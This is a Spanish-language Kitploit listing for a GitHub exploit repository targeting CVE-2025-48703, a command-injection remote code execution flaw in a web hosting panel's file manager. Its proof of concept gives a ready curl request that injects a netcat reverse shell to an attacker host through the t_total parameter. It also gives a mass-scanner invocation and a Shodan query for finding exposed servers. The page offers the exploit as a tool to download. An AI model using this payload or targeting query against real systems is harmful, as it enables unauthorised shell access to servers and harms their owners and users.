Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
CVE-2025-48703 — Ejecución remota de código en el panel web de CentOS | Kitploit
Herramientas/GitHubGitHub/skynoxk/cve-2025-48703
Análisis de VulnerabilidadesExplotaciónExplotación de Aplicaciones WebPruebas de PenetraciónComando y ControlDesarrollo de Payloads
GitHubskynoxk/cve-2025-48703

CVE-2025-48703

Ejecución remota de código en el panel web de CentOS

Ver Repositorio
31hace 1 añoAún no revisado

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir

🛡️ CVE-2025-48703 - Ejecución Remota de Código (RCE) en cPanel File Manager

📌 Descripción

CVE-2025-48703 es una vulnerabilidad de Ejecución Remota de Código (RCE) en el módulo filemanager de un panel de control de hosting web (por ejemplo, cPanel). Ocurre debido a manejo de entrada sin desinfección en la función acc=changePerm, lo que permite a un atacante inyectar y ejecutar comandos arbitrarios del sistema utilizando el parámetro t_total.


🧨 Impacto

Esta vulnerabilidad permite a los atacantes:

  • Ejecutar comandos arbitrarios en el servidor objetivo.
  • Establecer una shell inversa para acceso persistente.
  • Potencialmente escalar privilegios o moverse lateralmente.

⚠️ Este ataque puede realizarse con autenticación mínima, o en algunas configuraciones, acceso sin autenticación.


🚀 Prueba de Concepto (PoC)

✅ Comando de Shell Inversa

root@kitploit:~
curl -kis 'https://<TARGET_IP>:2083/myuser/index.php?module=filemanager&acc=changePerm' \
  --data 'fileName=.bashrc&currentPath=/home/myuser&t_total=`nc <ATTACKER_IP> 4444 -e /bin/bash`'

Uso del escáner

root@kitploit:~
python3 Scanner.py  #Make sure targets.txt is in the same dir

Búsqueda en Shodan

root@kitploit:~
Server: cwpsrv

Referencia: https://fenrisk.com/rce-centos-webpanel

Descargar herramienta